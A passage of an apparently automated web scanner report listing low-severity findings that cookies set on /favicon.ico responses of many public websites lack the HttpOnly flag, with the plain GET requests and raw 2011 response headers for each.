Date: Sat, 02 Apr 2011 13:51:34 GMT
Age: 11093
Connection: keep-alive
Set-Cookie: NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3087845525d5f4f58455e445a4a423660;path=/

GIF89a..........RR...............c........s10.aa.........c............_`.!!z.....p~..pq....BB............f...!.......,............'.d.-..I..m_$rt.d.aMR..... :.0..'.`....E.!.&.."#..1....H4J..6.h..K.PI
...[SNIP]...
14.76. http://www.cisco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cisco.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0
Last-Modified: Tue, 10 Jun 2008 19:13:16 GMT
ETag: "b8602b00"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:39:19 GMT
CDCHOST: ccows-sj-201
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:39:19 GMT
Connection: close
Set-Cookie: CP_GUTC=72.163.4.165.1301751559889702; path=/; expires=Wed, 26-Mar-36 13:39:19 GMT; domain=.cisco.com

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
14.77. http://www.classesusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classesusa.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.classesusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:11 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751191674809; path=/; expires=Mon, 01-Apr-13 13:33:11 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"894-1301525391000"
Last-Modified: Wed, 30 Mar 2011 22:49:51 GMT
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: BIGipServerpl.eduprod=688136202.20480.0000; path=/

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
14.78. http://www.cnn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cnn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:14 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Last-Modified: Wed, 28 Oct 2009 14:26:23 GMT
Accept-Ranges: bytes
Content-Length: 11502
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 12:38:17 GMT
Content-Type: image/x-icon
X-Pad: avoid browser bug

......00..........6... ......................h....)..(...0...`.........................................................................................................................................
...[SNIP]...
14.79. http://www.collegeconfidential.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeconfidential.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeconfidential.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Oct 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:57:54 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...
14.80. http://www.collegehumor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
14.81. http://www.collegesurfing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegesurfing.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 28 Aug 2007 01:10:23 GMT
ETag: "2190070-336-438b8233a3dc0"
Accept-Ranges: bytes
Content-Length: 822
Connection: close
Content-Type: image/bmp
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

BM6.......6...(.......................................Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*
...[SNIP]...
14.82. http://www.comcast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comcast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Mon, 14 Mar 2011 22:45:52 GMT
Accept-Ranges: bytes
ETag: "090259299e2cb1:149e"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 12:43:30 GMT
Connection: close
Set-Cookie: BIGipServerpool_comcastcom_VIP1=86896965.20480.0000; path=/

..............h.......(....... ...................................................\N......LJL.............$"$.4*..tj......................D:..|v......,"..l^..lnl.....424.........................LB....
...[SNIP]...
14.83. http://www.contacthr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contacthr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.contacthr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: trackerID=157429950; expires=Mon, 02-Apr-2012 14:09:13 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1626

Input string was not in a correct format.<br> at System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal)
at System.Numbe
...[SNIP]...
14.84. http://www.cornell.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cornell.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Last-Modified: Wed, 15 Sep 2010 19:11:24 GMT
ETag: "2da6bb-47e-49051187a3db1"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu

............ .h.......(....... ..... .............................................rr..88..........88..rr..................................ss..FF..........................FF..ss......................\\
...[SNIP]...
14.85. http://www.coupons.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupons.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coupons.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 27 Apr 2010 17:08:35 GMT
Accept-Ranges: bytes
ETag: "872d87452ce6ca1:3f3e"
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:25 GMT
CI_SVR_ID: 10/11
Set-Cookie: NSC_Njdsptjuft-IUUQ=ffffffffc3a0141a45525d5f4f58455e445a4a423660;Version=1;Max-Age=600;path=/

............ .h.......(....... ..... .....................................Q..Q..Q......................................................Q..Q..Q..Q..Q.P..........................................
...[SNIP]...
14.86. http://www.cracked.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cracked.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT
ETag: "b10423-37e-46eb15220f140"-gzip
Content-Type: image/x-icon
Expires: Sat, 02 Apr 2011 13:33:14 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:14 GMT
Content-Length: 894
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1050020106.20480.0000; path=/

..............h.......(....... .................................................[ZVC>M86L@<YTXc........................|zo..(..l....................yvs.............TVP..:"..%..".....-,.,&....&..#.....
...[SNIP]...
14.87. http://www.curse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: no-cache,private
Content-Length: 23341
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
14.88. http://www.cyberdefender.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyberdefender.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberdefender.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: clickforensics=208.118.60.116.1301751386236547; path=/
Last-Modified: Fri, 08 Oct 2010 18:52:31 GMT
ETag: "128eb5-47e-4921f8347b9c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................jki!jki.jki.jki.jki.jki!....................................jkiajki.....wv..wv......jki.jkia..........................
...[SNIP]...
14.89. http://www.dallasnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dallasnews.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dallasnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: ececluster=R1163981390; path=/; expires=Sun, 03-Apr-2011 13:38:53 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=cbLXNXlNtTLBMhK6jk7cRQSLRDz7k2q6Jy75gF2H1rTfSpNtTSJJ!-970429422; path=/; HttpOnly
x-svrl-ap: test-(null)
Vary: Accept-Encoding
Content-Length: 64474
Date: Sat, 02 Apr 2011 13:36:50 GMT
X-Varnish: 1530443752 1530427325
Age: 165
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT:5
x-svrl: V3


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></titl
...[SNIP]...
14.90. http://www.dealer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealer.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19895
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:16:53 GMT
Connection: close
Set-Cookie: exp_last_visit=986393813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/
Set-Cookie: exp_last_activity=1301753813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
14.91. http://www.deere.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deere.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deere.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:57 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 29 May 2003 16:44:18 GMT
ETag: "24e1bc-0-3bed045767c80"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: image/x-icon
Set-Cookie: BIGipServerdcdct-19th=234518948.13858.0000; path=/

14.92. http://www.directv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directv.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Wed, 21 Nov 2007 16:56:17 GMT
Accept-Ranges: bytes
ETag: "80cea66e5f2cc81:7d9"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:09 GMT

............ .h.......(....... ..... ............................................................................................................................................................3......
...[SNIP]...
14.93. http://www.discovercard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discovercard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.discovercard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:21 GMT
Server: Apache
Set-Cookie: v1st=D8BCADAE8D52A0E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.discovercard.com
Last-Modified: Thu, 26 Jun 2008 22:04:17 GMT
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/x-icon

14.94. http://www.doityourself.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doityourself.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.doityourself.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 05 Aug 2010 22:36:08 GMT
ETag: "3362228-37e-48d1b2d26e600"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Date: Sat, 02 Apr 2011 13:43:19 GMT
Age: 310500
Connection: keep-alive
Server: IBSrv 1.0
Set-Cookie: BIGipServerdiy_pool=1004867756.52514.0000; path=/

..............h.......(....... ...................................................................................................................................................|.u6..~...............
...[SNIP]...
14.95. http://www.drugstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drugstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.drugstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Tue, 29 Mar 2011 16:20:02 GMT
Accept-Ranges: bytes
ETag: "025de272deecb1:77ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Date: Sat, 02 Apr 2011 13:39:10 GMT
Set-Cookie: BIGipServerdscm_farm=1897179328.0.0000; expires=Sat, 02-Apr-2011 14:39:10 GMT; path=/

..............(.......(....... ...................................D.....................................................................................................................................
...[SNIP]...
14.96. http://www.eharmony.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eharmony.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:19 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 03 Mar 2009 02:00:31 GMT
ETag: "47e-4642d4cc30dc0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 13:37:19 GMT
Vary: Accept-Encoding
Content-Type: image/x-icon
Set-Cookie: BIGipServerFront=3910078892.16671.0000; path=/
Set-Cookie: lbid=acad40db-aaea-469e-7b2c-2ecabfc46d1a;expires=Thu, 29-Sep-2011 13:37:19 GMT;path=/;domain=.eharmony.com;

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
14.97. http://www.ehealthforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehealthforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehealthforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 12:24:47 GMT
ETag: "8e59f3-8be-4578f40dce1c0"
Accept-Ranges: bytes
Content-Length: 2238
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

...... ..............(... ...@.......................................................................................................G.....W....I.U.A............. .....M........... ....(...........
...[SNIP]...
14.98. http://www.emedtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.emedtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595155213; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
ETag: W/"1150-1196102204000"
Last-Modified: Mon, 26 Nov 2007 18:36:44 GMT
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

............ .h.......(....... ..... ..........................|m..|m..{k..wf..xk...y...........x..ym..vf..wf..zj..|m..|m..|m..|m..zk..vg......................................yl..wf..{k..|m..{l..vf...
...[SNIP]...
14.99. http://www.epinions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...
14.100. http://www.factmonster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factmonster.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.factmonster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:24 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301753784017126; path=/; expires=Sun, 01-Apr-12 14:16:24 GMT
Last-Modified: Fri, 26 Jan 2001 16:10:44 GMT
ETag: "13e-37bc85ec86900"
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 14:16:24 GMT
Content-Type: image/vnd.microsoft.icon

..............(.......(....... ...............................................................9#...........Y+.......Z...........................................................................].......
...[SNIP]...
14.101. http://www.familydoctor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
